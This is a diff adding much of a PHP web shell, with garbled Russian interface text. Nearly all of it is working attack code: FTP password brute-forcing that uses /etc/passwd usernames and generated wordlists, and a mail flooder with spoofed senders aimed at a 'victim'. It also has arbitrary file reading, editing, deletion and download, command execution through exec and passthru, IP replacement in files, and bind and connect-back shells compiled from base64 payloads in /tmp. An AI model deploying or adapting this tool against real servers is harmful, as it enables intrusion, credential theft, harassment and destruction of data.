+// ÔÒÏ ïîäáîğ ïàğîëåé
+case "ftppass":
+
+$filename="/etc/passwd"; // passwd file
+$ftp_server="localhost"; // FTP-server
+
+echo "FTP-server: <b>$ftp_server</b> <br><br>";
+
+$fp = fopen ($filename, "r");
+if ($fp)
+{
+while (!feof ($fp)) { 
+$buf = fgets($fp, 100);
+ereg("^([0-9a-zA-Z]{1,})\:",$buf,$g);
+$ftp_user_name=$g[1];
+$ftp_user_pass=$g[1];
+$conn_id=ftp_connect($ftp_server);
+$login_result=@ftp_login($conn_id, $ftp_user_name, $ftp_user_pass);
+
+if (($conn_id) && ($login_result)) {
+echo "<b>Ïîäêëş÷åíèå login:password - ".$ftp_user_name.":".$ftp_user_name."</b><br>";
+ftp_close($conn_id);}
+else {
+echo $ftp_user_name." - error<br>";
+}
+}}
+break;
+
+case "ftp":
+
+echo "
+ <TABLE CELLPADDING=0 CELLSPACING=0 width=500 align=center>
+ <form action='$PHP_SELF?ac=ftp' method=post><tr><td align=left valign=top colspan=3 class=pagetitle>
+ <b><a href=?ac=ftppass>Ïğîâåğèòü íà ñâÿçêó login\password</a></b>
+</td></tr>
+ 
+<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;FTP Host:</td>
+<td align=left width=350>&nbsp;&nbsp;&nbsp;
+<input class='inputbox' type='text' name='host' size=50></td></tr>
+<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;Login:</td>
+<td align=left width=350>&nbsp;&nbsp;&nbsp;
+<input class='inputbox' type='text' name='login' size=50></td></tr>
+<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;Êîëëè÷åñòâî ïàğîëåé:</td>
+<td align=left width=350>&nbsp;&nbsp;&nbsp;
+<input class='inputbox' type='text' name='number' size=10> <1000 pass </td></tr>
+<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;Ïàğîëü äëÿ ïğîâåğêè:</td>
+<td align=left width=350>&nbsp;&nbsp;&nbsp;
+<input class='inputbox' type='text' name='testing' size=50>
+<input type='submit' value='Brut FTP' class=button1 $style_button><br><b>Ëîã ñîõğàíÿåòñÿ â pass.txt</b></td></tr>
+
+
+ 
+ </form></table>";
+ 
+ 
+function s() {
+   $word="qwrtypsdfghjklzxcvbnm";
+   return $word[mt_rand(0,strlen($word)-1)];
+}
+
+function g() {
+   $word="euioam";
+   return $word[mt_rand(0,strlen($word)-2)];
+}
+
+function name0() {   return s().g().s();                        }
+function name1() {   return s().g().s().g();                    }
+function name2() {   return s().g().g().s();                    }
+function name3() {   return s().s().g().s().g();                }
+function name4() {   return g().s().g().s().g();                }
+function name5() {   return g().g().s().g().s();                }
+function name6() {   return g().s().s().g().s();                }
+function name7() {   return s().g().g().s().g();                }
+function name8() {   return s().g().s().g().g();                }
+function name9() {   return s().g().s().g().s().g();            }
+function name10() {   return s().g().s().s().g().s().s();        }
+function name11() {   return s().g().s().s().g().s().s().g();        }
+
+$cool=array(1,2,3,4,5,6,7,8,9,10,99,100,111,111111,666,1978,1979,1980,1981,1982,1983,1984,1985,1986,1987,1988,1989,1990,1991,1992,1993,1994,1995,1996,1997,1998,1999,2000,2001,2002,2003,2004,2005);
+$cool2=array('q1w2e3','qwerty','qwerty111111','123456','1234567890','0987654321','asdfg','zxcvbnm','qazwsx','q1e3r4w2','q1r4e3w2','1q2w3e','1q3e2w','poiuytrewq','lkjhgfdsa','mnbvcxz','asdf','root','admin','admin123','lamer123','admin123456','administrator','administrator123','q1w2e3r4t5','root123','microsoft','muther','hacker','hackers','cracker');
+
+function randword() {
+   global $cool;
+   $func="name".mt_rand(0,11);
+   $func2="name".mt_rand(0,11);
+   switch (mt_rand(0,11)) {
+      case 0: return $func().mt_rand(5,99);
+      case 1: return $func()."-".$func2();
+      case 2: return $func().$cool[mt_rand(0,count($cool)-1)];
+      case 3: return $func()."!".$func();
+      case 4: return randpass(mt_rand(5,12));
+      default: return $func();
+   }
+ 
+ 
+}
+
+function randpass($len) {
+   $word="qwertyuiopasdfghjklzxcvbnm1234567890";
+   $s="";
+   for ($i=0; $i<$len; $i++) {
+      $s.=$word[mt_rand(0,strlen($word)-1)];
+   }
+   return $s;
+}
+if (@unlink("pass.txt") < 0){
+echo "íè÷åãî íåò";
+exit;
+}
+$file="pass.txt"; 
+if($file && $host && $login){
+   $cn=mt_rand(30,30);
+for ($i=0; $i<$cn; $i++) {
+   $s=$cool2[$i];
+   $f=@fopen(pass.".txt","a+");
+   fputs($f,"$s\n");
+   }
+ 
+  $cnt2=mt_rand(43,43);
+for ($i=0; $i<$cnt2; $i++) {
+   $r=$cool[$i];
+   $f=@fopen(pass.".txt","a+");
+   fputs($f,"$login$r\n");
+}    
+$p="$testing";
+   $f=@fopen(pass.".txt","a+");
+   fputs($f,"$p\n");
+   
+ $cnt3=mt_rand($number,$number);
+   for ($i=0; $i<$cnt3; $i++) {
+   $u=randword();
+   $f=@fopen(pass.".txt","a+");
+   fputs($f,"$u\n");
+  } 
+  
+  if(is_file($file)){
+ $passwd=file($file,1000);
+  for($i=0; $i<count($passwd); $i++){
+   $stop=false;
+   $password=trim($passwd[$i]);
+   $open_ftp=@fsockopen($host,21);
+    if($open_ftp!=false){
+     fputs($open_ftp,"user $login\n");
+     fputs($open_ftp,"pass $password\n");
+     while(!feof($open_ftp) && $stop!=true){
+      $text=fgets($open_ftp,4096);
+      if(preg_match("/230/",$text)){
+       $stop=true;
+	   $f=@fopen($host._ftp,"a+");
+       fputs($f,"Enter on ftp:\nFTPhosting:\t$host\nLogin:\t$login\nPassword:\t$password\n ");
+
+       echo "
+	   	<TABLE CELLPADDING=0 CELLSPACING=0 width=500 align=center>
+<tr><td align=center class=pagetitle><b><font color=\"blue\">Ïîçäğàâëÿş!!! Ïàğîëü ïîäîáğàí.</font></b><br>
+&nbsp;&nbsp;Êîííåêò: <b>$host</b><br>&nbsp;&nbsp;Ëîãèí: <b>$login</b><br>&nbsp;&nbsp;Ïàğîëü: <b>$password</b></td></tr></table>
+";exit;
+      }
+      elseif(preg_match("/530/",$text)){
+       $stop=true;
+      
+      }
+     }
+     fclose($open_ftp);
+   }else{
+    echo "
+	<TABLE CELLPADDING=0 CELLSPACING=0  width=500 align=center>
+<tr><td align=center class=pagetitle bgcolor=#FF0000><b>Íåâåğíî óêàçàí ftp õîñòèíãà!!! Íà <b><u>$host</u></b> çàêğûò 21 ïîğò!</b></b></td></tr>
+</table>
+";exit;
+   }
+  }
+ }
+}
+
+
+break;
+// SQL Attack
+case "sql":
+
+break;
+
+
+
+
+
+
+// MailFlud
+case "mailfluder":
+
+$email=$_POST['email']; // Ìûëî æåğòâû
+$from=$_POST['from']; // Ìûëî æåğòâû
+$num=$_POST['num']; // ×èñëî ïèñåì
+$text=$_POST['text']; // Òåêñò ôëóäà
+$kb=$_POST['kb']; // Âåñ ïèñüìà (kb)
+?>
+<script language="JavaScript"><!--
+function reset_form() {
+document.forms[0].elements[0].value="";
+document.forms[0].elements[1].value="";
+document.forms[0].elements[2].value="";
+document.forms[0].elements[3].value="";
+document.forms[0].elements[4].value="";
+}
+//--></script>
+<?php
+if (($email!="" and isset($email)) and ($num!="" and isset($num)) and ($text!="" and isset($text)) and ($kb!="" and isset($kb))) {
+
+$num_text=strlen($text)+1; // Îïğåäåëÿåò äëèíó òåêñòà + 1 (ïğîáåë â êîíöå)
+$num_kb=(1024/$num_text)*$kb;
+$num_kb=ceil($num_kb);
+
+for ($i=1; $i<=$num_kb; $i++) {
+$msg=$msg.$text." ";
+}
+
+for ($i=1; $i<=$num; $i++) {
+mail($email, $text, $msg, "From: $from");
+}
+
+$all_kb=$num*$kb;
+
+echo <<<EOF
+<p align="center">Æåğòâà: <b>$email</b><br>
+Êîë-âî ïèñåì: <b>$num</b><br>
+Îáùèé ïîñëàííûé îáúåì: <b>$all_kb kb</b><br></p>
+EOF;
+
+}
+
+else {
+
+echo <<<EOF
+<form action="?ac=mailfluder" method="post">
+<table align="center" border="0" bordercolor="#000000">
+<tr><td>Ìûëî æåğòâû</td><td><input type="text" name="email" value="to@mail.com" size="25"></td></tr>
+<tr><td>Îò ëèïîâîãî ìûëà</td><td><input type="text" name="from" value="support@mail.com" size="25"></td></tr>
+<tr><td>×èñëî ïèñåì</td><td><input type="text" name="num" value="5" size="25"></td></tr>
+<tr><td>Òåêñò ôëóäà</td><td><input type="text" name="text" value="fack fack fack" size="25"></td></tr>
+<tr><td>Âåñ ïèñüìà (KB)</td><td><input type="text" name="kb" value="10" size="25"></td></tr>
+<tr><td colspan="2" align="center"><input type="submit">&nbsp;&nbsp;<input type="button" onclick="reset_form()" value="Reset"></td></tr>
+</table>
+</form>
+EOF;
+
+}
+break;
+
+case "tar":
+# àğõèâàöèÿ äèğåêòîğèè
+$fullpath = $d."/".$tar;
+/* çàäàåì ñëó÷àéíûå èìåíà ôàéëîâ àğõèâàöèè*/
+$CHARS = "abcdefghijklmnopqrstuvwxyz";
+for ($i=0; $i<6; $i++)  $charsname .= $CHARS[rand(0,strlen($CHARS)-1)];
+ echo "<br>
+Êàòàëîã <u><b>$fullpath</b></u>  ".exec("tar -zc $fullpath -f $charsname.tar.gz")."óïàêîâàí â ôàéë <u>$charsname.tar.gz</u>";
+
+
+
+echo "
+
+<form action='?ac=tar' method='post'>
+<tr><td align=center colspan=2 class=pagetitle><b>Àğõèâàöèÿ <u>$name.tar.gz</u>:</b></td></tr>
+<tr>
+<td valign=top><input type=text name=archive size=90 class='inputbox'value='tar -zc /home/$name$http_public -f $name.tar.gz' ></td>
+<td valign=top><input type=submit value='Íà÷àòü'></td>
+</tr></form>";
+
+exec($archive);
+
+break;
+
+
+// Íàâèãàöèÿ
+case "navigation":
+
+ // Ïîøëà íàâèãàöèÿ
+$mymenu = " [<a href='$php_self?ac=navigation&d=$d&e=$e'>Ïğîñìîòğ </a>] [<a href='$php_self?ac=navigation&d=$d&e=$e&delete=1'>Óäàëèòü</a>] [<a href='$php_self?ac=navigation&d=$d&ef=$e&edit=1'>Ğåäàêòèğîâàòü</a>] [<a href='$php_self?ac=navigation&d=$d&e=$e&clean=1'>Î÷èñòèòü</a>] [<a href='$php_self?ac=navigation&d=$d&e=$e&replace=1'>Çàìåíèòü òåêñò</a>] [<a href='$php_self?ac=navigation&d=$d&download=$e'>Çàãğóçèòü</a>]<br>";
+if(@$_GET['download']){
+@$download=$_GET['download'];
+@$d=$_GET['d'];
+header("Content-disposition: attachment; filename=\"$download\";");
+readfile("$d/$download");
+exit;}
+$images=array(".gif",".jpg",".png",".bmp",".jpeg");
+$whereme=getcwd();
+@$d=@$_GET['d'];
+$copyr = "<center>";
+$php_self=@$_SERVER['PHP_SELF'];
+if(@eregi("/",$whereme)){$os="unix";}else{$os="win";}
+if(!isset($d)){$d=$whereme;}
+$d=str_replace("\\","/",$d);
+
+
+
+$expl=explode("/",$d);
+$coun=count($expl);
+if($os=="unix"){echo "<a href='$php_self?ac=navigation&d=/'>/</a>";}
+else{
+        echo "<a href='$php_self?ac=navigation&d=$expl[0]'>$expl[0]/</a>";}
+for($i=1; $i<$coun; $i++){
+        @$xx.=$expl[$i]."/";
+$sls="<a href='$php_self?ac=navigation&d=$expl[0]/$xx'>$expl[$i]</a>/";
+$sls=str_replace("//","/",$sls);
+$sls=str_replace("/'></a>/","/'></a>",$sls);
+print $sls;
+}
+echo "</td></tr>";
+//if($os=="unix"){ echo "
+//<tr><td><b>id:</b> ".@exec('id')."</td></tr>
+//<tr><td><b>uname -a:</b> ".@exec('uname -a')."</td></tr>";}
+if(@$_GET['delfl']){
+@$delfolder=$_GET['delfolder'];
+echo "DELETE FOLDER: <font color=red>".@$_GET['delfolder']."</font><br>
+(All files must be writable)<br>
+<a href='$php_self?deldir=1&dir=".@$delfolder."&rback=".@$_GET['rback']."'>Yes</a> || <a href='$php_self?ac=navigation&d=$d'>No</a><br><br>
+";
+exit;
+}
+if(@$_GET['deldir']){
+@$dir=$_GET['dir'];
+function deldir($dir)
+{
+$handle = @opendir($dir);
+while (false!==($ff = @readdir($handle))){
+if($ff != "." && $ff != ".."){
+if(@is_dir("$dir/$ff")){
+deldir("$dir/$ff");
+}else{
+@unlink("$dir/$ff");
+}}}
+@closedir($handle);
+if(@rmdir($dir)){
+@$success = true;}
+return @$success;
+}
+$dir=@$dir;
+deldir($dir);
+
+$rback=$_GET['rback'];
+@$rback=explode("/",$rback);
+$crb=count($rback);
+for($i=0; $i<$crb-1; $i++){
+        @$x.=$rback[$i]."/";
+}
+echo "<meta http-equiv=\"REFRESH\" content=\"0;URL='$php_self?ac=navigation&d=".@$x."'\">";
+echo $copyr;
+exit;}
+if(@$_GET['replace']=="1"){
+$ip=@$_SERVER['REMOTE_ADDR'];
+$d=$_GET['d'];
+$e=$_GET['e'];
+@$de=$d."/".$e;
+$de=str_replace("//","/",$de);
+$e=@$e;
+echo $mymenu ;
+echo "
+Ñğåäñòâî çàìåíû:<br>
+(òû ìîæåøü çàìåíèòü ëşáîé òåêñò)<br>
+Ôàéë: $de<br>
+<form method=post>
+1. Òâîé IP<br>
+2. IP microsoft.com :)<br>
+Çàìåíÿòü ıòî <input name=this size=30 value=$ip> ıòèì <input name=bythis size=30 value=207.46.245.156>
+<input type=submit name=doit value=Çàìåíèòü>
+</form>
+";
+
+if(@$_POST['doit']){
+
+$filename="$d/$e";
+$fd = @fopen ($filename, "r");
+$rpl = @fread ($fd, @filesize ($filename));
+$re=str_replace("$this","$bythis",$rpl);
+$x=@fopen("$d/$e","w");
+@fwrite($x,"$re");
+echo "<br><center>$this çàìåíåíî íà $bythis<br>
+[<a href='$php_self?ac=navigation&d=$d&e=$e'>Ïîñìîòğåòü ôàéë</a>]<br><br><Br>";
+
+}
+echo $copyr;
+exit;}
+
+
+
+
+if(@$_GET['yes']=="yes"){
+$d=@$_GET['d']; $e=@$_GET['e'];
+unlink($d."/".$e);
+$delresult="$d/$e óäàëåí! <meta http-equiv=\"REFRESH\" content=\"2;URL=$php_self?ac=navigation&d=$d\">";
+}
+if(@$_GET['clean']=="1"){
+@$e=$_GET['e'];
+$x=fopen("$d/$e","w");
+fwrite($x,"");
+echo "<meta http-equiv=\"REFRESH\" content=\"0;URL=$php_self?ac=navigation&d=$d&e=".@$e."\">";
+exit;
+}
+
+
+if(@$_GET['e']){
+$d=@$_GET['d'];
+$e=@$_GET['e'];
+$pinf=pathinfo($e);
+if(in_array(".".@$pinf['extension'],$images)){
+echo "<meta http-equiv=\"REFRESH\" content=\"0;URL=$php_self?ac=navigation&d=$d&e=$e&img=1\">";
+exit;}
+$filename="$d/$e";
+$fd = @fopen ($filename, "r");
+$c = @fread ($fd, @filesize ($filename));
+$c=htmlspecialchars($c);
+$de=$d."/".$e;
+$de=str_replace("//","/",$de);
+if(is_file($de)){
+if(!is_writable($de)){echo "<font color=red><br><b>ÒÎËÜÊÎ ×ÒÅÍÈÅ</b></font><br>";}}
+echo $mymenu ;
+echo "
+Ñîäåğæèìîå ôàéëà:<br>
+$de
+<br>
+<table width=100% border=1 cellpadding=0 cellspacing=0>
+<tr><td><pre>
+$c
+
+</pre></td></tr>
+</table>";
+if(@$_GET['delete']=="1"){
+$delete=$_GET['delete'];
+echo "
+Óäàëåíèå: òû óâåğåí?<br>
+<a href=\"$php_self?ac=navigation&d=$d&e=$e&delete=".@$delete."&yes=yes\">Äà</a> || <a href='$php_self?no=1'>Íåò</a>
+<br>
+";
+if(@$_GET['yes']=="yes"){
+@$d=$_GET['d']; @$e=$_GET['e'];
+echo $delresult;
+}
+if(@$_GET['no']){
+echo "<meta http-equiv=\"REFRESH\" content=\"0;URL=$php_self?ac=navigation&d=$d&e=$e\">
+";
+}
+
+
+} #end of delete
+echo $copyr;
+exit;
+} #end of e
+
+if(@$_GET['edit']=="1"){
+@$d=$_GET['d'];
+@$ef=$_GET['ef'];
+if(is_file($d."/".$ef)){
+if(!is_writable($d."/".$ef)){echo "<font color=red><br><b>ÒÎËÜÊÎ ×ÒÅÍÈÅ</b></font><br>";}}
+echo $mymenu ;
+$filename="$d/$ef";
+$fd = @fopen ($filename, "r");
+$c = @fread ($fd, @filesize ($filename));
+$c=htmlspecialchars($c);
+$de=$d."/".$ef;
+$de=str_replace("//","/",$de);
+echo "
+Ğåäàêòèğîâàíèå:<br>
+$de<br>
+<form method=post>
+<input type=HIDDEN name=filename value='$d/$ef'>
+<textarea cols=143 rows=30 name=editf>$c</textarea>
+<br>
+<input type=submit name=save value='Ñîõğàíèòü èçìåíåíèÿ'></form><br>
+
+";
+if(@$_POST['save']){
+$editf=@$_POST['editf'];
+$editf=stripslashes($editf);
+$f=fopen($filename,"w+");
+fwrite($f,"$editf");
+echo "<meta http-equiv=\"REFRESH\" content=\"0;URL=$php_self?ac=navigation&d=$d&e=$ef\">";
+exit;
+}
+echo $copyr;
+exit;
+}
+
+
+
+echo"
+<table width=100% cellpadding=1 cellspacing=0 class=hack>
+<tr><td bgcolor=#4d9ef0><center><b>Íàçâàíèå</b></td><td bgcolor=#4d9ef0><center><b>Òèï</b></td><td bgcolor=#4d9ef0><b>Ğàçìåğ</b></td><td bgcolor=#4d9ef0><center><b>Âëàäåëåö/Ãğóïïà</b></td><td bgcolor=#4d9ef0><b>Ïğàâà</b></td></tr>
+";
+$dirs=array();
+$files=array();
+$dh = @opendir($d) or die("<table width=100%><tr><td><center>Êàòàëîã íå ñóùåñòâóåò èëè äîñòóï ê íåìó çàïğåùåí!</center><br>$copyr</td></tr></table>");
+while (!(($file = readdir($dh)) === false)) {
+if ($file=="." || $file=="..") continue;
+if (@is_dir("$d/$file")) {
+      $dirs[]=$file;
+}else{
+      $files[]=$file;
+      }
+   sort($dirs);
+   sort($files);
+
+$fz=@filesize("$d/$file");
+}
+
+function perm($perms){
+if (($perms & 0xC000) == 0xC000) {
+   $info = 's';
+} elseif (($perms & 0xA000) == 0xA000) {
+   $info = 'l';
+} elseif (($perms & 0x8000) == 0x8000) {
+   $info = '-';
+} elseif (($perms & 0x6000) == 0x6000) {
+   $info = 'b';
+} elseif (($perms & 0x4000) == 0x4000) {
+   $info = 'd';
+} elseif (($perms & 0x2000) == 0x2000) {
+   $info = 'c';
+} elseif (($perms & 0x1000) == 0x1000) {
+   $info = 'p';
+} else {
+   $info = 'u';
+}
+$info .= (($perms & 0x0100) ? 'r' : '-');
+$info .= (($perms & 0x0080) ? 'w' : '-');
+$info .= (($perms & 0x0040) ?
+           (($perms & 0x0800) ? 's' : 'x' ) :
+           (($perms & 0x0800) ? 'S' : '-'));
+$info .= (($perms & 0x0020) ? 'r' : '-');
+$info .= (($perms & 0x0010) ? 'w' : '-');
+$info .= (($perms & 0x0008) ?
+           (($perms & 0x0400) ? 's' : 'x' ) :
+           (($perms & 0x0400) ? 'S' : '-'));
+$info .= (($perms & 0x0004) ? 'r' : '-');
+$info .= (($perms & 0x0002) ? 'w' : '-');
+$info .= (($perms & 0x0001) ?
+           (($perms & 0x0200) ? 't' : 'x' ) :
+           (($perms & 0x0200) ? 'T' : '-'));
+return $info;
+}
+
+
+for($i=0; $i<count($dirs); $i++){
+if(is_writable($dirs[$i])){$info="<font color=green><li>&nbsp;W</font>";}
+else{$info="<font color=red><li>&nbsp;R</font>";}
+$perms = @fileperms($d."/".$dirs[$i]);
+$owner = @fileowner($d."/".$dirs[$i]);
+if($os=="unix"){
+$fileownera=posix_getpwuid($owner);
+$owner=$fileownera['name'];
+}
+$group = @filegroup($d."/".$dirs[$i]);
+if($os=="unix"){
+$groupinfo = posix_getgrgid($group);
+$group=$groupinfo['name'];
+}
+$info=perm($perms);
+if($i%2){$color="#aed7ff";}else{$color="#68adf2";}   
+$linkd="<a href='$php_self?ac=navigation&d=$d/$dirs[$i]'>$dirs[$i]</a>";
+$linkd=str_replace("//","/",$linkd);
+echo "<tr><td bgcolor=$color><font face=wingdings size=2>0</font> $linkd</td><td bgcolor=$color><center><font color=blue>DIR</font></td><td bgcolor=$color>&nbsp;</td><td bgcolor=$color><center>$owner/$group</td><td bgcolor=$color>$info</td></tr>";
+}
+
+for($i=0; $i<count($files); $i++){
+if(is_writable($files[$i])){$info="<font color=green><li>&nbsp;W</font>";}
+else{$info="<font color=red><li>&nbsp;R</font>";}
+$size=@filesize($d."/".$files[$i]);
+$perms = @fileperms($d."/".$files[$i]);
+$owner = @fileowner($d."/".$files[$i]);
+if($os=="unix"){
+$fileownera=posix_getpwuid($owner);
+$owner=$fileownera['name'];
+}
+$group = @filegroup($d."/".$files[$i]);
+if($os=="unix"){
+$groupinfo = posix_getgrgid($group);
+$group=$groupinfo['name'];
+}
+$info=perm($perms);
+if($i%2){$color="#ccccff";}else{$color="#b0b0ff";}  
+
+if ($size < 1024){$siz=$size.' b';
+}else{
+if ($size < 1024*1024){$siz=number_format(($size/1024), 2, '.', '').' kb';}else{
+if ($size < 1000000000){$siz=number_format($size/(1024*1024), 2, '.', '').' mb';}else{
+if ($size < 1000000000000){$siz=number_format($size/(1024*1024*1024), 2, '.', '').' gb';}
+}}}
+echo "<tr><td bgcolor=$color><font face=wingdings size=3>2</font> <a href='$php_self?ac=navigation&d=$d&e=$files[$i]'>$files[$i]</a></td><td bgcolor=$color><center><a href='$php_self?ac=navigation&d=$d&download=$files[$i]' title='Download $files[$i]'><font size=2 face=Webdings color=green>`</font></a></td><td bgcolor=$color>$siz</td><td bgcolor=$color><center>$owner/$group</td><td bgcolor=$color>$info</td></tr>";
+}
+
+echo "</table></td></tr></table>";
+echo $copyr;
+break;
+
+// Óñòàíîâêà áåêäîğà
+case "backconnect":
+echo "<b>Óñòàíîâêà áåêäîğà / îòêğûòèå ïîğòà</b>";
+echo "<form name=bind method=POST>";
+echo "<font face=Verdana size=-2>";
+echo "<b>Îòêğûòü ïîğò </b>";
+echo "<input type=text name=port size=15 value=11457>&nbsp;";
+echo "<b>Ïàğîëü äëÿ äîñòóïà </b>";
+echo "<input type=text name=bind_pass size=15 value=nrws>&nbsp;";
+echo "<b>Èñïîëüçîâàòü </b>";
+echo "<select size=\"1\" name=\"use\">";
+echo "<option value=\"Perl\">Perl</option>";
+echo "<option value=\"C\">C</option>";
+echo "</select>&nbsp;";
+echo "<input type=hidden name=dir value=".$dir.">";
+echo "<input type=submit name=submit value=Îòêğûòü>";
+echo "</font>";
+echo "</form>";
+
+echo "<b>Óñòàíîâêà áåêäîğà / connect-back</b>";
+echo "<form name=back method=POST>";
+echo "<font face=Verdana size=-2>";
+echo "<b>IP-àäğåñ </b>";
+echo "<input type=text name=ip size=15 value=127.0.0.1>&nbsp;";
+echo "<b>Ïîğò </b>";
+echo "<input type=text name=port size=15 value=31337>&nbsp;";
+echo "<b>Èñïîëüçîâàòü </b>";
+echo "<select size=\"1\" name=\"use\">";
+echo "<option value=\"Perl\">Perl</option>";
+echo "<option value=\"C\">C</option>";
+echo "</select>&nbsp;";
+echo "<input type=hidden name=dir value=".$dir.">";
+echo "<input type=submit name=submit value=Âûïîëíèòü>";
+echo "</font>";
+echo "</form>";
+
+
+/* port bind C */
+if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="C"))
+{
+ $w_file=fopen("/tmp/bd.c","ab+") or $err=1;
+ if($err==1)
+ {
+ echo "<font color=red face=Fixedsys><div align=center>ÎØÈÁÊÀ! Íåâîçìîæíà çàïèñü â /tmp/bd.c</div></font>";
+ $err=0;
+ }
+ else
+ {
+ fputs($w_file,base64_decode($port_bind_bd_c));
+ fclose($w_file);
+ $blah=exec("gcc -o /tmp/bd /tmp/bd.c");
+ unlink("/tmp/bd.c");
+ $bind_string="/tmp/bd ".$_POST['port']." ".$_POST['bind_pass']." &";
+ $blah=exec($bind_string);
+ $_POST['cmd']="ps -aux | grep bd";
+ $err=0;
+ }
+}
+
+/* port bind Perl */
+if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="Perl"))
+{
+ $w_file=fopen("/tmp/bdpl","ab+") or $err=1;
+ if($err==1)
+ {
+ echo "<font color=red face=Fixedsys><div align=center>ÎØÈÁÊÀ! Íåâîçìîæíà çàïèñü â /tmp/</div></font>";
+ $err=0;
+ }
+ else
+ {
+ fputs($w_file,base64_decode($port_bind_bd_pl));
+ fclose($w_file);
+ $bind_string="perl /tmp/bdpl ".$_POST['port']." &";
+ $blah=exec($bind_string);
+ $_POST['cmd']="ps -aux | grep bdpl";
+ $err=0;
+ }
+}
+
+/* back connect Perl */
+if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="Perl"))
+{
+ $w_file=fopen("/tmp/back","ab+") or $err=1;
+ if($err==1)
+ {
+ echo "<font color=red face=Fixedsys><div align=center>ÎØÈÁÊÀ! Íåâîçìîæíà çàïèñü â /tmp/</div></font>";
+ $err=0;
+ }
+ else
+ {
+ fputs($w_file,base64_decode($back_connect));
+ fclose($w_file);
+ $bc_string="perl /tmp/back ".$_POST['ip']." ".$_POST['port']." &";
+ $blah=exec($bc_string);
+ $_POST['cmd']="echo \"Ñåé÷àñ ñêğèïò êîííåêòèòñÿ ê ".$_POST['ip']." port ".$_POST['port']." ...\"";
+ $err=0;
+ }
+}
+
+/* back connect C */
+if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="C"))
+{
+ $w_file=fopen("/tmp/back.c","ab+") or $err=1;
+ if($err==1)
+ {
+ echo "<font color=red face=Fixedsys><div align=center>ÎØÈÁÊÀ! Íåâîçìîæíà çàïèñü â /tmp/back.c</div></font>";
+ $err=0;
+ }
+ else
+ {
+ fputs($w_file,base64_decode($back_connect_c));
+ fclose($w_file);
+ $blah=exec("gcc -o /tmp/backc /tmp/back.c");
+ unlink("/tmp/back.c");
+ $bc_string="/tmp/backc ".$_POST['ip']." ".$_POST['port']." &";
+ $blah=exec($bc_string);
+ $_POST['cmd']="echo \"Ñåé÷àñ ñêğèïò êîííåêòèòñÿ ê ".$_POST['ip']." port ".$_POST['port']." ...\"";
+ $err=0;
+ }
+}
+echo "<font face=Verdana size=-2>Âûïîëíåííàÿ êîìàíäà: <b>".$_POST['cmd']."</b></font></td></tr><tr><td>";
+echo "<b>";
+echo "<br>Ğåçóëüòàò: ";
+echo "<font color=red size=2";
+print "".passthru($_POST['cmd'])."";
+echo "</font></b>";
+break;
+
+// Uploading
+case "upload":
+
+echo <<<HTML
+<b>Çàãğóçêà ôàéëîâ</b>
+<a href='$php_self?ac=massupload&d=$d&t=massupload'>* Çàãğóçèòü áîëüøîå êîëè÷åñòâî ôàéëîâ *</a><br><br>
+<table>
+<form enctype="multipart/form-data" action="$self" method="POST">
+<input type="hidden" name="ac" value="upload">
+<tr>
+<td>Ôàéë:</td>
+<td><input size="48" name="file" type="file"></td>
+</tr>
+<tr>
+<td>Ïàïêà:</td>
+<td><input size="48" value="$docr/" name="path" type="text"><input type="submit" value="Ïîñëàòü"></td><br>
+$tend
+HTML;
+
+if (isset($_POST['path'])){
+
+$uploadfile = $_POST['path'].$_FILES['file']['name'];
+if ($_POST['path']==""){$uploadfile = $_FILES['file']['name'];}
+
+if (copy($_FILES['file']['tmp_name'], $uploadfile)) {
+    echo "Ôàéë óñïåøíî çàãğóæåí â ïàïêó $uploadfile\n";
+    echo "Èìÿ:" .$_FILES['file']['name']. "\n";
+    echo "Ğàçìåğ:" .$_FILES['file']['size']. "\n";
+
+} else {
+    print "Íå óäà¸òñÿ çàãğóçèòü ôàéë. Info:\n";
+    print_r($_FILES);
+}
+}
+
+
+echo "<form enctype='multipart/form-data' action='?ac=upload&status=ok' method=post>
+<b>Çàãğóçêà ôàéëîâ ñ óäàëåííîãî êîìïüşòåğà:</b><br>
+ HTTP-ïóòü ê ôàéëó: <br>
+<input type='text' name='file3' value='http://' size=40><br>
+Íàçâàíèå ôàéëà èëè ïóòü ñ íàçâàíèåì ôàéëà: <br>
+<input type='text' name='file2' value='$docr/' size=40><br>
+<input type='submit' value='Çàãğóçèòü ôàéë'></form>";
+
+
+$data = @implode("", file($file3));
+$fp = @fopen($file2, "wb");
+@fputs($fp, $data);
+$ok = @fclose($fp);
+if($ok)
+{
+$size = filesize($file2)/1024;
+$sizef = sprintf("%.2f", $size);
+
+print "<br><center>Âû çàãğóçèëè: <b>ôàéë <u>$file2</u> ğàçìåğîì</b> (".$sizef."êÁ) </center>";
+}
+else
+{
+print "<br><center><font color=red  size = 2><b>Îøèáêà çàãğóçêè ôàéëà</b></font></center>";
+}
+
+
+
+
+break;
+// Tools
+case "tools":
+echo "<form method=post>Ãåíåğàöèÿ md5-øèôğà<br><input name=md5 size=30></form><br>";
+@$md5=@$_POST['md5'];
+if(@$_POST['md5']){ echo "md5 ñãåíåğèğîâàí:<br> ".md5($md5)."";}
+echo "<br>
+<form method=post>Êîäèğîâàíèå/äåêîäèğîâàíèå base64<br><input name=base64 size=30></form><br>";
+if(@$_POST['base64']){
+@$base64=$_POST['base64'];
+echo "
+Êîäèğîâàíî:<br><textarea rows=8 cols=80>".base64_encode($base64)."</textarea><br>
+Äåêîäèğîâàíî: <br><textarea rows=8 cols=80>".base64_decode($base64)."</textarea><br>";}
+echo "<br>
+<form method=post>DES-êîäèğîâàíèå:<br><input name=des size=30></form><br>";
+if(@$_POST['des']){
+@$des=@$_POST['des'];
+echo "DES ñãåíåğèğîâàí: <br>".crypt($des)."";}
+echo "<br>
+<form method=post>SHA1-êîäèğîâàíèå:<br><input name=sha1 size=30></form><br>";
+if(@$_POST['sha1']){
+@$des=@$_POST['sha1'];
+echo "SHA1 ñãåíåğèğîâàí: <br>".sha1($sha1a)."";}
+
+echo "<form method=POST>";
+echo "html-êîä -> øåñòíàäöàòèğè÷íûå çíà÷åíèÿ<br><input type=text name=data size=30>";
+
+
+if (isset($_POST['data']))
+{
+echo "<br><br><b>Ğåçóëüòàò:<br></b>";
